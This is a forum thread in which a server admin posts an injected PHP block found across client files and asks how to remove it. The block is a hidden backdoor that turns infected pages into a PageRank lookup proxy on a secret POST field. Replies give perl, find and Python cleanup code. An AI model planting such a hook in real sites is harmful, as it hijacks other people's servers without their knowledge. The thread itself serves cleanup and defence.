LinuxQuestions.org > Linux - Server > Need to remove dynamic string across multiple lines and files. (https://www.linuxquestions.org/questions/linux-server-73/need-to-remove-dynamic-string-across-multiple-lines-and-files-880565/)

vandigroup 05-13-2011 12:58 PM

Need to remove dynamic string across multiple lines and files.
 
I know there have been numerous posts on this but I cannot seem to figure out a solution for my dilemma.

My server was hit with an injection script which has placed code across many of my clients' files. I need a script that can remove a block of php code that spans multiple lines, multiple directories/files and is dynamic, meaning that part of the code changes. I think using find/sed is what I need but cannot seem to figure out how to get it to work.

The following is the script that is being injected everywhere. The catch is that they have generated dynamic code at the start/end of the script. (I have commented the parts that are dynamically changing on EVERY instance).

PLEASE NOTE: Directly following this script is the start of a valid php script that I do not want to delete.

Code:

<?php
//{{65281980 - DYNAMIC!!

// Run-once guard; error reporting is switched off so the payload fails silently.
GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
    $alreadyxxx = 1;
    $olderrxxx=error_reporting(0);

    // StrToNum, HashURL and CheckHash rebuild the "ch" checksum the old Google
    // Toolbar attached to PageRank queries. Note the PHP 5 $Str{$i} offset syntax.
    function StrToNum($Str, $Check, $Magic)
    {
        $Int32Unit = 4294967296;
        $length = strlen($Str);
        for ($i = 0; $i < $length; $i++) {
            $Check *= $Magic;
            if ($Check >= $Int32Unit) {
                $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
                $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
            }
            $Check += ord($Str{$i});
        }
        return $Check;
    }

    function HashURL($String)
    {
        $Check1 = StrToNum($String, 0x1505, 0x21);
        $Check2 = StrToNum($String, 0, 0x1003F);

        $Check1 >>= 2;
        $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
        $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
        $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

        $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
        $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

        return ($T1 | $T2);
    }

    function CheckHash($Hashnum)
    {
        $CheckByte = 0;
        $Flag = 0;

        $HashStr = sprintf('%u', $Hashnum) ;
        $length = strlen($HashStr);

        for ($i = $length-1; $i >= 0; $i--) {
            $Re = $HashStr{$i};
            if (1 === ($Flag % 2)) {
                $Re += $Re;
                $Re = (int)($Re / 10) + ($Re % 10);
            }
            $CheckByte += $Re;
            $Flag ++;
        }

        $CheckByte %= 10;
        if (0 !== $CheckByte) {
            $CheckByte = 10 - $CheckByte;
            if (1 === ($Flag % 2) ) {
                if (1 === ($CheckByte % 2)) {
                    $CheckByte += 9;
                }
                $CheckByte >>= 1;
            }
        }

        return '7'.$CheckByte.$HashStr;
    }

    // Asks Google's toolbar endpoint for the PageRank of $url and returns it,
    // or -1 if the response carries no "Rank_" field.
    function getpr($url)
    {
        $ch = CheckHash(HashURL($url));
        $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
        $data = file_get_contents($file);
        $pos = strpos($data, "Rank_");
        if($pos === false){return -1;} else{
            $pr=substr($data, $pos + 9);
            $pr=trim($pr);
            $pr=str_replace("\n",'',$pr);   // posted with a literal line break inside the quotes
            return $pr;
        }
    }

    // The trigger: any POST carrying "xxxprch" turns the infected page into an
    // anonymous PageRank lookup proxy for whoever sends it, then exits.
    if(isset($_POST['xxxprch']))
    {
        echo getpr($_POST['xxxprch']);
        exit();
    }
    error_reporting($olderrxxx);
}

//}}459611f4 - DYNAMIC CODE!!
?>

-- START OF VALID CODE - DO NOT DELETE BELOW THIS LINE--

Code:

<?php
/**
* @version

Thank you immensely to anyone who can help with this pressing issue. Joe

neonsignal 05-13-2011 11:34 PM

You can strip out multiline matches using various tools including perl, eg:
Code:

perl -p0777i -e 's/<\?php.*?toolbarqueries.*?\?>//gs' test.html

The '-p0777' turns off the separator so that the whole file will be slurped in. The search and replace looks for the start and end of the php script in the file, using *? so that it minimally matches; otherwise it will match across multiple php scripts. And the 's' on the regular expression is so that the '.' matches will include newline characters. I have used the string 'toolbarqueries' as a signature to try to match only the offending scripts, but it might need to be more specific, as a false match would be bad.

You can then use find to do this across multiple files, eg:
Code:

find . -name \*.html -exec perl -p0777i -e 's/<\?php.*?toolbarqueries.*?\?>//gs' {} \;

Test the command on some sample files before unleashing it on the whole system; there is no undo! It would of course be safer to just restore the damaged files from backups if this is an option.
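Building on neonsignal's approach, here is an added example (mine, not from this thread) that anchors on the "//{{<8 hex>" and "//}}<8 hex>" markers from the original post as well as the "toolbarqueries" signature, refuses to match across a second "<?php", and dry-runs by default. The clean_tree function, the .bak backup and the sample input are assumptions of mine.

```python
import re
from pathlib import Path

# Anchors from the sample posted above: "<?php" directly followed by a
# "//{{<8 hex digits>" marker, the "toolbarqueries" string somewhere in the body,
# then "//}}<8 hex digits>" and "?>". The hex ids are the DYNAMIC parts and are
# matched by shape only. The lookahead keeps the lazy body from running across a
# second "<?php", so a legitimate block before or after the payload survives.
INJECTED_BLOCK = re.compile(
    r"<\?php[ \t\r]*\n//\{\{[0-9a-fA-F]{8}\b"      # opening tag + dynamic marker
    r"(?:(?!<\?php).)*?toolbarqueries"             # body up to the signature
    r"(?:(?!<\?php).)*?"                           # rest of the body
    r"//\}\}[0-9a-fA-F]{8}\b[^\n]*\n[ \t]*\?>\s*", # closing marker, "?>", gap
    re.DOTALL,
)

def strip_injected(text: str) -> tuple[str, int]:
    """Return (cleaned text, number of payload blocks removed)."""
    return INJECTED_BLOCK.subn("", text)

def clean_tree(root: Path, suffixes=(".php", ".html"), dry_run=True) -> dict:
    """Report hits per file under root; rewrite only when dry_run is False.
    Assumed behaviour (not from the thread): the untouched bytes are saved
    as <name>.bak before a file is modified."""
    hits = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix not in suffixes:
            continue
        raw = path.read_bytes()
        cleaned, n = strip_injected(raw.decode("utf-8", "surrogateescape"))
        if n:
            hits[str(path)] = n
            if not dry_run:
                path.with_name(path.name + ".bak").write_bytes(raw)
                path.write_bytes(cleaned.encode("utf-8", "surrogateescape"))
    return hits

# Constructed sample, modelled on the post: a legitimate block, a shortened
# payload with the marker ids from the post, then the start of the real script.
SAMPLE = (
    "<?php echo 'header'; ?>\n"
    "<?php\n//{{65281980\n\nGLOBAL $alreadyxxx;\nif($alreadyxxx != 1)\n{\n"
    "$file = \"http://toolbarqueries.google.com/search?q=info:$url\";\n}\n\n"
    "//}}459611f4\n?>\n\n<?php\n/**\n* @version 1.0\n*/\n"
)
CLEANED, REMOVED = strip_injected(SAMPLE)
# REMOVED == 1; CLEANED == "<?php echo 'header'; ?>\n<?php\n/**\n* @version 1.0\n*/\n"
```

Run clean_tree(Path("/path/to/webroot")) first to see which files would be touched, and pass dry_run=False only once the hit list looks right.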

lodragan 05-14-2011 11:50 PM

I'm assuming that crackers are modifying your files, and you want to fix the files? Here is how you do it:

1. Disconnect your servers from the internet.

2. Restore all your servers from backups.

3. Fix injection error/bug.

4. Connect servers back to the internet.